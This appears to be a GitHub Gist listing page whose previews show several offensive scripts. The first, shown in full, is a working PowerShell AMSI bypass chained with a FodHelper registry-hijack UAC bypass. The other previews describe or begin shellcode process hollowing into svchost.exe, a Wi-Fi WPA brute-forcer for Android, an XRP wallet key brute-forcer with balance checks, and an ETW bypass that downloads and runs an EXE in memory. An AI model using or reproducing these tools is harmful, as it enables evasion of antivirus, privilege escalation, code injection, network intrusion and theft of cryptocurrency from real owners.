Razz LongWayHomie

  • gov.pl
  • Warsaw
@LongWayHomie
LongWayHomie / UACElevate-FodHelper-AMSI.ps1
Created November 16, 2024 17:22
Script to bypass AMSI in PS and use FodHelper to bypass UAC
#Bypass AMSI
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
#UAC Bypass
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "C:\Users\bfarmer\Desktop\ph.exe" -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
C:\Windows\System32\fodhelper.exe
@LongWayHomie
LongWayHomie / DynWin32-ShellcodeProcessHollowing.ps1
Created July 14, 2024 08:19 — forked from qtc-de/DynWin32-ShellcodeProcessHollowing.ps1
PowerShell implementation of shellcode-based Process Hollowing that relies only on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode-based process hollowing using
dynamically looked-up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it uses GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls have been looked up, it starts svchost.exe in a suspended state
and overwrites the entry point with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed within the trusted svchost.exe process.
@LongWayHomie
LongWayHomie / mjolnir.sh
Created March 16, 2024 20:26 — forked from Celestial-intelligence/mjolnir.sh
Bash script to brute-force Wi-Fi networks (WPA key) without an external adapter or monitor mode on Android devices. Will add a feature to brute-force WPS too in the future.
#!/bin/bash
# ATTENTION!!!
# Highly recommended to use with https://github.com/beardache/WiFiMap or https://forums.kali.org/showthread.php?23080-adstar-Wordlist-Generator-v1-0 (this one gives passwords quickly, straight from stdout ;)
# The attached wpa_cli binary was compiled for the armv7 architecture. However, you can find a build for your own architecture on the internet.
# Forked from https://github.com/rasta-mouse/Mjolnir
### text colours ###
red='\e[0;31m'
@LongWayHomie
LongWayHomie / xrp-smasher.py
Last active June 10, 2023 22:34
XRP Wallet Brute-Force (with online balance check)
from xrpl import wallet
from xrpl.core import keypairs
from xrpl.clients import JsonRpcClient
from xrpl.account import get_account_info
from xrpl.account.main import get_balance
import requests
import time
import os
def create_wallet():
@LongWayHomie
LongWayHomie / ETW_Bypass.cs
Created March 14, 2023 16:59
ETW bypass that downloads an EXE file from a web server and runs it from memory
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
namespace ETW_Bypass
{
internal class Program
{